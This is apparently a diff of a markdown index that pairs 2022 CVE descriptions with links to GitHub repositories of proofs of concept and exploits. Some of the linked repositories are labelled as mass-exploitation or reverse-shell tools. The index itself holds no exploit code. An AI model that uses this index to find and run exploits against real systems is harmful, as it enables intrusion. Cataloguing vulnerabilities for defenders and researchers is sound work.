[TheCyberGeek/CVE-2022-27251](https://github.com/TheCyberGeek/CVE-2022-27251) + +### CVE-2022-27254 (2022-03-23) + +The remote keyless system on Honda Civic 2018 vehicles sends the same RF signal for each door-open request, which allows for a replay attack, a related issue to CVE-2019-20626. + + +- [nonamecoder/CVE-2022-27254](https://github.com/nonamecoder/CVE-2022-27254) + +### CVE-2022-27255 (2022-08-01) + +In Realtek eCos RSDK 1.5.7p1 and MSDK 4.9.4p1, the SIP ALG function that rewrites SDP data has a stack-based buffer overflow. This allows an attacker to remotely execute code without authentication via a crafted SIP packet that contains malicious SDP data. + + +- [infobyte/cve-2022-27255](https://github.com/infobyte/cve-2022-27255) +- [stryker-project/CVE-2022-27255-checker](https://github.com/stryker-project/CVE-2022-27255-checker) + +### CVE-2022-27413 (2022-05-03) + +Hospital Management System v1.0 was discovered to contain a SQL injection vulnerability via the adminname parameter in admin.php. + + +- [HH1F/CVE-2022-27413](https://github.com/HH1F/CVE-2022-27413) + +### CVE-2022-27414 +- [lus33rr/CVE-2022-27414](https://github.com/lus33rr/CVE-2022-27414) + ### CVE-2022-27434 (2022-07-17) UNIT4 TETA Mobile Edition (ME) before 29.5.HF17 was discovered to contain a SQL injection vulnerability via the ProfileName parameter in the errorReporting page. @@ -1079,6 +19771,34 @@ - [gerr-re/cve-2022-27438](https://github.com/gerr-re/cve-2022-27438) +### CVE-2022-27499 (2022-11-11) + +Premature release of resource during expected lifetime in the Intel(R) SGX SDK software may allow a privileged user to potentially enable information disclosure via local access. + + +- [web-logs2/snapshot-demo](https://github.com/web-logs2/snapshot-demo) + +### CVE-2022-27502 (2022-06-10) + +RealVNC VNC Server 6.9.0 through 5.1.0 for Windows allows local privilege escalation because an installer repair operation executes %TEMP% files as SYSTEM. + + +- [alirezac0/CVE-2022-27502](https://github.com/alirezac0/CVE-2022-27502) + +### CVE-2022-27518 (2022-12-13) + +Unauthenticated remote arbitrary code execution\n + + +- [dolby360/CVE-2022-27518_POC](https://github.com/dolby360/CVE-2022-27518_POC) + +### CVE-2022-27646 (2023-03-29) + +This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R6700v3 1.0.4.120_10.0.91 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the circled daemon. A crafted circleinfo.txt file can trigger an overflow of a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-15879. + + +- [cyber-defence-campus/netgear_r6700v3_circled](https://github.com/cyber-defence-campus/netgear_r6700v3_circled) + ### CVE-2022-27665 (2023-04-03) Reflected XSS (via AngularJS sandbox escape expressions) exists in Progress Ipswitch WS_FTP Server 8.6.0. This can lead to execution of malicious code and commands on the client due to improper handling of user-provided input. By inputting malicious payloads in the subdirectory searchbar or Add folder filename boxes, it is possible to execute client-side commands. For example, there is Client-Side Template Injection via subFolderPath to the ThinClient/WtmApiService.asmx/GetFileSubTree URI. @@ -1086,6 +19806,14 @@ - [dievus/CVE-2022-27665](https://github.com/dievus/CVE-2022-27665) +### CVE-2022-27666 (2022-03-23) + +A heap buffer overflow flaw was found in IPsec ESP transformation code in net/ipv4/esp4.c and net/ipv6/esp6.c. This flaw allows a local attacker with a normal user privilege to overwrite kernel heap objects and may cause a local privilege escalation threat. + + +- [plummm/CVE-2022-27666](https://github.com/plummm/CVE-2022-27666) +- [Albocoder/cve-2022-27666-exploits](https://github.com/Albocoder/cve-2022-27666-exploits) + ### CVE-2022-27772 (2022-03-30) spring-boot versions prior to version v2.2.11.RELEASE was vulnerable to temporary directory hijacking. This vulnerability impacted the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer @@ -1093,6 +19821,34 @@ - [puneetbehl/grails3-cve-2022-27772](https://github.com/puneetbehl/grails3-cve-2022-27772) +### CVE-2022-27925 (2022-04-20) + +Zimbra Collaboration (aka ZCS) 8.8.15 and 9.0 has mboximport functionality that receives a ZIP archive and extracts files from it. An authenticated user with administrator rights has the ability to upload arbitrary files to the system, leading to directory traversal. + + +- [vnhacker1337/CVE-2022-27925-PoC](https://github.com/vnhacker1337/CVE-2022-27925-PoC) +- [mohamedbenchikh/CVE-2022-27925](https://github.com/mohamedbenchikh/CVE-2022-27925) +- [miko550/CVE-2022-27925](https://github.com/miko550/CVE-2022-27925) +- [navokus/CVE-2022-27925](https://github.com/navokus/CVE-2022-27925) +- [Josexv1/CVE-2022-27925](https://github.com/Josexv1/CVE-2022-27925) +- [Chocapikk/CVE-2022-27925-Revshell](https://github.com/Chocapikk/CVE-2022-27925-Revshell) +- [akincibor/CVE-2022-27925](https://github.com/akincibor/CVE-2022-27925) +- [touchmycrazyredhat/CVE-2022-27925-Revshell](https://github.com/touchmycrazyredhat/CVE-2022-27925-Revshell) +- [jam620/Zimbra](https://github.com/jam620/Zimbra) +- [Inplex-sys/CVE-2022-27925](https://github.com/Inplex-sys/CVE-2022-27925) +- [onlyHerold22/CVE-2022-27925-PoC](https://github.com/onlyHerold22/CVE-2022-27925-PoC) +- [sanan2004/CVE-2022-27925](https://github.com/sanan2004/CVE-2022-27925) + +### CVE-2022-27927 (2022-04-19) + +A SQL injection vulnerability exists in Microfinance Management System 1.0 when MySQL is being used as the application database. An attacker can issue SQL commands to the MySQL database through the vulnerable course_code and/or customer_number parameter. + + +- [erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated](https://github.com/erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated) + +### CVE-2022-27997 +- [Cyb3rEnthusiast/CVE-2023-27997](https://github.com/Cyb3rEnthusiast/CVE-2023-27997) + ### CVE-2022-28077 (2022-05-11) Home Owners Collection Management v1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in the Admin panel via the $_GET['s'] parameter. @@ -1107,6 +19863,20 @@ - [bigzooooz/CVE-2022-28078](https://github.com/bigzooooz/CVE-2022-28078) +### CVE-2022-28079 (2022-05-05) + +College Management System v1.0 was discovered to contain a SQL injection vulnerability via the course_code parameter. + + +- [erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated](https://github.com/erengozaydin/College-Management-System-course_code-SQL-Injection-Authenticated) + +### CVE-2022-28080 (2022-05-05) + +Royal Event Management System v1.0 was discovered to contain a SQL injection vulnerability via the todate parameter. + + +- [erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated](https://github.com/erengozaydin/Royal-Event-Management-System-todate-SQL-Injection-Authenticated) + ### CVE-2022-28099 (2022-05-04) Poultry Farm Management System v1.0 was discovered to contain a SQL injection vulnerability via the Item parameter at /farm/store.php. @@ -1127,6 +19897,14 @@ - [cheshireca7/CVE-2022-28117](https://github.com/cheshireca7/CVE-2022-28117) +- [kimstars/POC-CVE-2022-28117](https://github.com/kimstars/POC-CVE-2022-28117) + +### CVE-2022-28118 (2022-05-03) + +SiteServer CMS v7.x allows attackers to execute arbitrary code via a crafted plug-in. + + +- [Richard-Tang/SSCMS-PluginShell](https://github.com/Richard-Tang/SSCMS-PluginShell) ### CVE-2022-28132 (-) @@ -1135,12 +19913,22 @@ - [alpernae/CVE-2022-28132](https://github.com/alpernae/CVE-2022-28132) +### CVE-2022-28171 (2022-06-27) + +The web module in some Hikvision Hybrid SAN/Cluster Storage products have the following security vulnerability. Due to the insufficient input validation, attacker can exploit the vulnerability to execute restricted commands by sending messages with malicious commands to the affected device. + + +- [NyaMeeEain/CVE-2022-28171-POC](https://github.com/NyaMeeEain/CVE-2022-28171-POC) +- [aengussong/hikvision_probe](https://github.com/aengussong/hikvision_probe) + ### CVE-2022-28219 (2022-04-05) Cewolf in Zoho ManageEngine ADAudit Plus before 7060 is vulnerable to an unauthenticated XXE attack that leads to Remote Code Execution. - [horizon3ai/CVE-2022-28219](https://github.com/horizon3ai/CVE-2022-28219) +- [rbowes-r7/manageengine-auditad-cve-2022-28219](https://github.com/rbowes-r7/manageengine-auditad-cve-2022-28219) +- [aeifkz/CVE-2022-28219-Like](https://github.com/aeifkz/CVE-2022-28219-Like) ### CVE-2022-28281 (2022-12-22) @@ -1149,6 +19937,13 @@ - [0vercl0k/CVE-2022-28281](https://github.com/0vercl0k/CVE-2022-28281) +### CVE-2022-28282 (2022-12-22) + +By using a link with <code>rel="localization"</code> a use-after-free could have been triggered by destroying an object during JavaScript execution and then referencing the object through a freed pointer, leading to a potential exploitable crash. This vulnerability affects Thunderbird < 91.8, Firefox < 99, and Firefox ESR < 91.8. + + +- [bb33bb/CVE-2022-28282-firefox](https://github.com/bb33bb/CVE-2022-28282-firefox) + ### CVE-2022-28346 (2022-04-12) An issue was discovered in Django 2.2 before 2.2.28, 3.2 before 3.2.13, and 4.0 before 4.0.4. QuerySet.annotate(), aggregate(), and extra() methods are subject to SQL injection in column aliases via a crafted dictionary (with dictionary expansion) as the passed **kwargs. @@ -1157,6 +19952,24 @@ - [YouGina/CVE-2022-28346](https://github.com/YouGina/CVE-2022-28346) - [DeEpinGh0st/CVE-2022-28346](https://github.com/DeEpinGh0st/CVE-2022-28346) - [ahsentekd/CVE-2022-28346](https://github.com/ahsentekd/CVE-2022-28346) +- [vincentinttsh/CVE-2022-28346](https://github.com/vincentinttsh/CVE-2022-28346) +- [kamal-marouane/CVE-2022-28346](https://github.com/kamal-marouane/CVE-2022-28346) + +### CVE-2022-28368 (2022-04-03) + +Dompdf 1.2.1 allows remote code execution via a .php file in the src:url field of an @font-face Cascading Style Sheets (CSS) statement (within an HTML input file). + + +- [rvizx/CVE-2022-28368](https://github.com/rvizx/CVE-2022-28368) +- [That-Guy-Steve/CVE-2022-28368-handler](https://github.com/That-Guy-Steve/CVE-2022-28368-handler) +- [Henryisnotavailable/Dompdf-Exploit-RCE](https://github.com/Henryisnotavailable/Dompdf-Exploit-RCE) + +### CVE-2022-28381 (2022-04-03) + +Mediaserver.exe in ALLMediaServer 1.6 has a stack-based buffer overflow that allows remote attackers to execute arbitrary code via a long string to TCP port 888, a related issue to CVE-2017-17932. + + +- [DShankle/CVE-2022-28381_PoC](https://github.com/DShankle/CVE-2022-28381_PoC) ### CVE-2022-28452 (2022-04-29) @@ -1200,6 +20013,14 @@ - [FlaviuPopescu/CVE-2022-28601](https://github.com/FlaviuPopescu/CVE-2022-28601) +### CVE-2022-28672 (2022-07-18) + +This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader 11.2.1.53537. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of Doc objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-16640. + + +- [hacksysteam/CVE-2022-28672](https://github.com/hacksysteam/CVE-2022-28672) +- [fastmo/CVE-2022-28672](https://github.com/fastmo/CVE-2022-28672) + ### CVE-2022-28943 - [zhefox/CVE-2022-28943](https://github.com/zhefox/CVE-2022-28943) @@ -1259,6 +20080,13 @@ - [sudoninja-noob/CVE-2022-29009](https://github.com/sudoninja-noob/CVE-2022-29009) +### CVE-2022-29063 (2022-09-02) + +The Solr plugin of Apache OFBiz is configured by default to automatically make a RMI request on localhost, port 1099. In version 18.12.05 and earlier, by hosting a malicious RMI server on localhost, an attacker may exploit this behavior, at server start-up or on a server restart, in order to run arbitrary code. Upgrade to at least 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12646. + + +- [mbadanoiu/CVE-2022-29063](https://github.com/mbadanoiu/CVE-2022-29063) + ### CVE-2022-29072 (2022-04-15) 7-Zip through 21.07 on Windows allows privilege escalation and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. NOTE: multiple third parties have reported that no privilege escalation can occur @@ -1267,6 +20095,32 @@ - [kagancapar/CVE-2022-29072](https://github.com/kagancapar/CVE-2022-29072) - [tiktb8/CVE-2022-29072](https://github.com/tiktb8/CVE-2022-29072) - [sentinelblue/CVE-2022-29072](https://github.com/sentinelblue/CVE-2022-29072) +- [Phantomiman/7-Zip.chm-Mitigation](https://github.com/Phantomiman/7-Zip.chm-Mitigation) +- [rasan2001/CVE-2022-29072](https://github.com/rasan2001/CVE-2022-29072) + +### CVE-2022-29078 (2022-04-25) + +The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation). + + +- [miko550/CVE-2022-29078](https://github.com/miko550/CVE-2022-29078) +- [shurochka1396/expluatation_CVE-2022-29078](https://github.com/shurochka1396/expluatation_CVE-2022-29078) +- [l0n3m4n/CVE-2022-29078](https://github.com/l0n3m4n/CVE-2022-29078) +- [chuckdu21/CVE-2022-29078](https://github.com/chuckdu21/CVE-2022-29078) + +### CVE-2022-29154 (2022-08-02) + +An issue was discovered in rsync before 3.2.5 that allows malicious remote servers to write arbitrary files inside the directories of connecting peers. The server chooses which files/directories are sent to the client. However, the rsync client performs insufficient validation of file names. A malicious rsync server (or Man-in-The-Middle attacker) can overwrite arbitrary files in the rsync client target directory and subdirectories (for example, overwrite the .ssh/authorized_keys file). + + +- [EgeBalci/CVE-2022-29154](https://github.com/EgeBalci/CVE-2022-29154) + +### CVE-2022-29170 (2022-05-20) + +Grafana is an open-source platform for monitoring and observability. In Grafana Enterprise, the Request security feature allows list allows to configure Grafana in a way so that the instance doesn’t call or only calls specific hosts. The vulnerability present starting with version 7.4.0-beta1 and prior to versions 7.5.16 and 8.5.3 allows someone to bypass these security configurations if a malicious datasource (running on an allowed host) returns an HTTP redirect to a forbidden host. The vulnerability only impacts Grafana Enterprise when the Request security allow list is used and there is a possibility to add a custom datasource to Grafana which returns HTTP redirects. In this scenario, Grafana would blindly follow the redirects and potentially give secure information to the clients. Grafana Cloud is not impacted by this vulnerability. Versions 7.5.16 and 8.5.3 contain a patch for this issue. There are currently no known workarounds. + + +- [yijikeji/CVE-2022-29170](https://github.com/yijikeji/CVE-2022-29170) ### CVE-2022-29221 (2022-05-24) @@ -1297,6 +20151,21 @@ - [ZSECURE/CVE-2022-29359](https://github.com/ZSECURE/CVE-2022-29359) +### CVE-2022-29361 (2022-05-24) + +Improper parsing of HTTP requests in Pallets Werkzeug v2.1.0 and below allows attackers to perform HTTP Request Smuggling using a crafted HTTP request with multiple requests included inside the body. NOTE: the vendor's position is that this behavior can only occur in unsupported configurations involving development mode and an HTTP server from outside the Werkzeug project + + +- [kevin-mizu/Werkzeug-CVE-2022-29361-PoC](https://github.com/kevin-mizu/Werkzeug-CVE-2022-29361-PoC) +- [l3ragio/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS](https://github.com/l3ragio/CVE-2022-29361_Werkzeug_Client-Side-Desync-to-XSS) + +### CVE-2022-29380 (2022-05-25) + +Academy-LMS v4.3 was discovered to contain a stored cross-site scripting (XSS) vulnerability in the SEO panel. + + +- [OpenXP-Research/CVE-2022-29380](https://github.com/OpenXP-Research/CVE-2022-29380) + ### CVE-2022-29383 (2022-05-13) NETGEAR ProSafe SSL VPN firmware FVS336Gv2 and FVS336Gv3 was discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi. @@ -1311,6 +20180,11 @@ - [GULL2100/Wordpress_xss-CVE-2022-29455](https://github.com/GULL2100/Wordpress_xss-CVE-2022-29455) +- [akhilkoradiya/CVE-2022-29455](https://github.com/akhilkoradiya/CVE-2022-29455) +- [yaudahbanh/CVE-2022-29455](https://github.com/yaudahbanh/CVE-2022-29455) +- [0xc4t/CVE-2022-29455](https://github.com/0xc4t/CVE-2022-29455) +- [tucommenceapousser/CVE-2022-29455](https://github.com/tucommenceapousser/CVE-2022-29455) +- [tucommenceapousser/CVE-2022-29455-mass](https://github.com/tucommenceapousser/CVE-2022-29455-mass) ### CVE-2022-29464 (2022-04-18) @@ -1335,6 +20209,17 @@ - [jimidk/Better-CVE-2022-29464](https://github.com/jimidk/Better-CVE-2022-29464) - [electr0lulz/Mass-exploit-CVE-2022-29464](https://github.com/electr0lulz/Mass-exploit-CVE-2022-29464) - [g0dxing/CVE-2022-29464](https://github.com/g0dxing/CVE-2022-29464) +- [Pasch0/WSO2RCE](https://github.com/Pasch0/WSO2RCE) +- [r4x0r1337/-CVE-2022-29464](https://github.com/r4x0r1337/-CVE-2022-29464) +- [amit-pathak009/CVE-2022-29464](https://github.com/amit-pathak009/CVE-2022-29464) +- [amit-pathak009/CVE-2022-29464-mass](https://github.com/amit-pathak009/CVE-2022-29464-mass) +- [hupe1980/CVE-2022-29464](https://github.com/hupe1980/CVE-2022-29464) +- [gbrsh/CVE-2022-29464](https://github.com/gbrsh/CVE-2022-29464) +- [devengpk/CVE-2022-29464](https://github.com/devengpk/CVE-2022-29464) +- [ThatNotEasy/CVE-2022-29464](https://github.com/ThatNotEasy/CVE-2022-29464) +- [Pushkarup/CVE-2022-29464](https://github.com/Pushkarup/CVE-2022-29464) +- [SynixCyberCrimeMy/CVE-2022-29464](https://github.com/SynixCyberCrimeMy/CVE-2022-29464) +- [cc3305/CVE-2022-29464](https://github.com/cc3305/CVE-2022-29464) ### CVE-2022-29465 (2022-08-05) @@ -1343,6 +20228,9 @@ - [badguy233/CVE-2022-29465](https://github.com/badguy233/CVE-2022-29465) +### CVE-2022-29469 +- [S4muraiMelayu1337/CVE-2022-29469](https://github.com/S4muraiMelayu1337/CVE-2022-29469) + ### CVE-2022-29548 (2022-04-21) A reflected XSS issue exists in the Management Console of several WSO2 products. This affects API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0. @@ -1362,6 +20250,21 @@ ### CVE-2022-29554 - [ComparedArray/printix-CVE-2022-29554](https://github.com/ComparedArray/printix-CVE-2022-29554) +### CVE-2022-29581 (2022-05-17) + +Improper Update of Reference Count vulnerability in net/sched of Linux Kernel allows local attacker to cause privilege escalation to root. This issue affects: Linux Kernel versions prior to 5.18; version 4.14 and later versions. + + +- [Nidhi77777/linux-4.19.72_CVE-2022-29581](https://github.com/Nidhi77777/linux-4.19.72_CVE-2022-29581) +- [nidhihcl/linux-4.19.72_CVE-2022-29581](https://github.com/nidhihcl/linux-4.19.72_CVE-2022-29581) + +### CVE-2022-29582 (2022-04-22) + +In the Linux kernel before 5.17.3, fs/io_uring.c has a use-after-free due to a race condition in io_uring timeouts. This can be triggered by a local user who has no access to any user namespace; however, the race condition perhaps can only be exploited infrequently. + + +- [Ruia-ruia/CVE-2022-29582-Exploit](https://github.com/Ruia-ruia/CVE-2022-29582-Exploit) + ### CVE-2022-29593 (2022-07-14) relay_cgi.cgi on Dingtian DT-R002 2CH relay devices with firmware 3.1.276A allows an attacker to replay HTTP post requests without the need for authentication or a valid signed/authorized request. @@ -1397,12 +20300,20 @@ - [TyeYeah/DIR-890L-1.20-RCE](https://github.com/TyeYeah/DIR-890L-1.20-RCE) +### CVE-2022-29856 (2022-04-29) + +A hardcoded cryptographic key in Automation360 22 allows an attacker to decrypt exported RPA packages. + + +- [Flo451/CVE-2022-29856-PoC](https://github.com/Flo451/CVE-2022-29856-PoC) + ### CVE-2022-29885 (2022-05-12) The documentation of Apache Tomcat 10.1.0-M1 to 10.1.0-M14, 10.0.0-M1 to 10.0.20, 9.0.13 to 9.0.62 and 8.5.38 to 8.5.78 for the EncryptInterceptor incorrectly stated it enabled Tomcat clustering to run over an untrusted network. This was not correct. While the EncryptInterceptor does provide confidentiality and integrity protection, it does not protect against all risks associated with running over any untrusted network, particularly DoS risks. - [quynhlab/CVE-2022-29885](https://github.com/quynhlab/CVE-2022-29885) +- [iveresk/CVE-2022-29885](https://github.com/iveresk/CVE-2022-29885) ### CVE-2022-29932 (2022-05-11) @@ -1442,6 +20353,29 @@ - [aaronsvk/CVE-2022-30075](https://github.com/aaronsvk/CVE-2022-30075) - [SAJIDAMINE/CVE-2022-30075](https://github.com/SAJIDAMINE/CVE-2022-30075) +- [M4fiaB0y/CVE-2022-30075](https://github.com/M4fiaB0y/CVE-2022-30075) + +### CVE-2022-30114 (2023-05-19) + +A heap-based buffer overflow in a network service in Fastweb FASTGate MediaAccess FGA2130FWB, firmware version 18.3.n.0482_FW_230_FGA2130, and DGA4131FWB, firmware version up to 18.3.n.0462_FW_261_DGA4131, allows a remote attacker to reboot the device through a crafted HTTP request, causing DoS. + + +- [str0ng4le/CVE-2022-30114](https://github.com/str0ng4le/CVE-2022-30114) + +### CVE-2022-30129 (2022-05-10) + +Visual Studio Code Remote Code Execution Vulnerability + + +- [RoccoPearce/CVE-2022-30129](https://github.com/RoccoPearce/CVE-2022-30129) + +### CVE-2022-30136 (2022-06-15) + +Windows Network File System Remote Code Execution Vulnerability + + +- [fortra/CVE-2022-30136](https://github.com/fortra/CVE-2022-30136) +- [AXRoux/CVE-2022-30136](https://github.com/AXRoux/CVE-2022-30136) ### CVE-2022-30190 (2022-06-01) @@ -1514,6 +20448,46 @@ - [Cerebrovinny/follina-CVE-2022-30190](https://github.com/Cerebrovinny/follina-CVE-2022-30190) - [Lucaskrell/go_follina](https://github.com/Lucaskrell/go_follina) - [Gra3s/CVE-2022-30190_EXP_PowerPoint](https://github.com/Gra3s/CVE-2022-30190_EXP_PowerPoint) +- [EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-](https://github.com/EkamSinghWalia/Follina-MSDT-Vulnerability-CVE-2022-30190-) +- [jeffreybxu/five-nights-at-follina-s](https://github.com/jeffreybxu/five-nights-at-follina-s) +- [Captain404/Follina-CVE-2022-30190-PoC-sample](https://github.com/Captain404/Follina-CVE-2022-30190-PoC-sample) +- [winstxnhdw/CVE-2022-30190](https://github.com/winstxnhdw/CVE-2022-30190) +- [Imeneallouche/Follina-attack-CVE-2022-30190-](https://github.com/Imeneallouche/Follina-attack-CVE-2022-30190-) +- [mattjmillner/CVE-Smackdown](https://github.com/mattjmillner/CVE-Smackdown) +- [0xAbbarhSF/FollinaXploit](https://github.com/0xAbbarhSF/FollinaXploit) +- [michealadams30/Cve-2022-30190](https://github.com/michealadams30/Cve-2022-30190) +- [melting0256/Enterprise-Cybersecurity](https://github.com/melting0256/Enterprise-Cybersecurity) +- [yrkuo/CVE-2022-30190](https://github.com/yrkuo/CVE-2022-30190) +- [ToxicEnvelope/FOLLINA-CVE-2022-30190](https://github.com/ToxicEnvelope/FOLLINA-CVE-2022-30190) +- [hycheng15/CVE-2022-30190](https://github.com/hycheng15/CVE-2022-30190) +- [aminetitrofine/CVE-2022-30190](https://github.com/aminetitrofine/CVE-2022-30190) +- [Muhammad-Ali007/Follina_MSDT_CVE-2022-30190](https://github.com/Muhammad-Ali007/Follina_MSDT_CVE-2022-30190) +- [Jump-Wang-111/AmzWord](https://github.com/Jump-Wang-111/AmzWord) +- [shri142/ZipScan](https://github.com/shri142/ZipScan) +- [alien-keric/CVE-2022-30190](https://github.com/alien-keric/CVE-2022-30190) +- [ethicalblue/Follina-CVE-2022-30190-Sample](https://github.com/ethicalblue/Follina-CVE-2022-30190-Sample) + +### CVE-2022-30203 (2022-07-12) + +Windows Boot Manager Security Feature Bypass Vulnerability + + +- [Wack0/dubiousdisk](https://github.com/Wack0/dubiousdisk) + +### CVE-2022-30206 (2022-07-12) + +Windows Print Spooler Elevation of Privilege Vulnerability + + +- [MagicPwnrin/CVE-2022-30206](https://github.com/MagicPwnrin/CVE-2022-30206) +- [Malwareman007/CVE-2022-30206](https://github.com/Malwareman007/CVE-2022-30206) + +### CVE-2022-30216 (2022-07-12) + +Windows Server Service Tampering Vulnerability + + +- [corelight/CVE-2022-30216](https://github.com/corelight/CVE-2022-30216) ### CVE-2022-30292 (2022-05-04) @@ -1522,6 +20496,17 @@ - [sprushed/CVE-2022-30292](https://github.com/sprushed/CVE-2022-30292) +### CVE-2022-30333 (2022-05-09) + +RARLAB UnRAR before 6.12 on Linux and UNIX allows directory traversal to write to files during an extract (aka unpack) operation, as demonstrated by creating a ~/.ssh/authorized_keys file. NOTE: WinRAR and Android RAR are unaffected. + + +- [TheL1ghtVn/CVE-2022-30333-PoC](https://github.com/TheL1ghtVn/CVE-2022-30333-PoC) +- [rbowes-r7/unrar-cve-2022-30333-poc](https://github.com/rbowes-r7/unrar-cve-2022-30333-poc) +- [J0hnbX/CVE-2022-30333](https://github.com/J0hnbX/CVE-2022-30333) +- [aslitsecurity/Zimbra-CVE-2022-30333](https://github.com/aslitsecurity/Zimbra-CVE-2022-30333) +- [paradox0909/cve-2022-30333_online_rar_extracor](https://github.com/paradox0909/cve-2022-30333_online_rar_extracor) + ### CVE-2022-30489 (2022-05-13) WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi. @@ -1529,6 +20514,9 @@ - [badboycxcc/XSS-CVE-2022-30489](https://github.com/badboycxcc/XSS-CVE-2022-30489) +### CVE-2022-30507 +- [yosef0x01/CVE-2022-30507-PoC](https://github.com/yosef0x01/CVE-2022-30507-PoC) + ### CVE-2022-30510 (2022-05-27) School Dormitory Management System 1.0 is vulnerable to SQL Injection via reports/daily_collection_report.php:59. @@ -1564,6 +20552,13 @@ - [bigzooooz/CVE-2022-30514](https://github.com/bigzooooz/CVE-2022-30514) +### CVE-2022-30524 (2022-05-09) + +There is an invalid memory access in the TextLine class in TextOutputDev.cc in Xpdf 4.0.4 because the text extractor mishandles characters at large y coordinates. It can be triggered by (for example) sending a crafted pdf file to the pdftotext binary, which allows a remote attacker to cause a Denial of Service (Segmentation fault) or possibly have unspecified other impact. + + +- [rishvic/xpdf-docker](https://github.com/rishvic/xpdf-docker) + ### CVE-2022-30525 (2022-05-12) A OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device. @@ -1582,6 +20577,15 @@ - [west9b/CVE-2022-30525](https://github.com/west9b/CVE-2022-30525) - [furkanzengin/CVE-2022-30525](https://github.com/furkanzengin/CVE-2022-30525) - [ProngedFork/CVE-2022-30525](https://github.com/ProngedFork/CVE-2022-30525) +- [cbk914/CVE-2022-30525_check](https://github.com/cbk914/CVE-2022-30525_check) +- [arajsingh-infosec/CVE-2022-30525_Exploit](https://github.com/arajsingh-infosec/CVE-2022-30525_Exploit) + +### CVE-2022-30526 (2022-07-19) + +A privilege escalation vulnerability was identified in the CLI command of Zyxel USG FLEX 100(W) firmware versions 4.50 through 5.30, USG FLEX 200 firmware versions 4.50 through 5.30, USG FLEX 500 firmware versions 4.50 through 5.30, USG FLEX 700 firmware versions 4.50 through 5.30, USG FLEX 50(W) firmware versions 4.16 through 5.30, USG20(W)-VPN firmware versions 4.16 through 5.30, ATP series firmware versions 4.32 through 5.30, VPN series firmware versions 4.30 through 5.30, USG/ZyWALL series firmware versions 4.09 through 4.72, which could allow a local attacker to execute some OS commands with root privileges in some directories on a vulnerable device. + + +- [greek0x0/CVE-2022-30526](https://github.com/greek0x0/CVE-2022-30526) ### CVE-2022-30591 (2022-07-06) @@ -1590,6 +20594,27 @@ - [efchatz/QUIC-attacks](https://github.com/efchatz/QUIC-attacks) +### CVE-2022-30592 (2022-05-11) + +liblsquic/lsquic_qenc_hdl.c in LiteSpeed QUIC (aka LSQUIC) before 3.1.0 mishandles MAX_TABLE_CAPACITY. + + +- [efchatz/HTTP3-attacks](https://github.com/efchatz/HTTP3-attacks) + +### CVE-2022-30594 (2022-05-12) + +The Linux kernel before 5.17.2 mishandles seccomp permissions. The PTRACE_SEIZE code path allows attackers to bypass intended restrictions on setting the PT_SUSPEND_SECCOMP flag. + + +- [Lay0us/linux-4.19.72_CVE-2022-30594](https://github.com/Lay0us/linux-4.19.72_CVE-2022-30594) + +### CVE-2022-30600 (2022-05-18) + +A flaw was found in moodle where logic used to count failed login attempts could result in the account lockout threshold being bypassed. + + +- [Boonjune/POC-CVE-2022-30600](https://github.com/Boonjune/POC-CVE-2022-30600) + ### CVE-2022-30778 - [kang8/CVE-2022-30778](https://github.com/kang8/CVE-2022-30778) @@ -1599,6 +20624,7 @@ - [p0dalirius/CVE-2022-30780-lighttpd-denial-of-service](https://github.com/p0dalirius/CVE-2022-30780-lighttpd-denial-of-service) +- [xiw1ll/CVE-2022-30780_Checker](https://github.com/xiw1ll/CVE-2022-30780_Checker) ### CVE-2022-30781 (2022-05-16) @@ -1607,6 +20633,70 @@ - [wuhan005/CVE-2022-30781](https://github.com/wuhan005/CVE-2022-30781) +### CVE-2022-30887 (2022-05-20) + +Pharmacy Management System v1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component /php_action/editProductImage.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file. + + +- 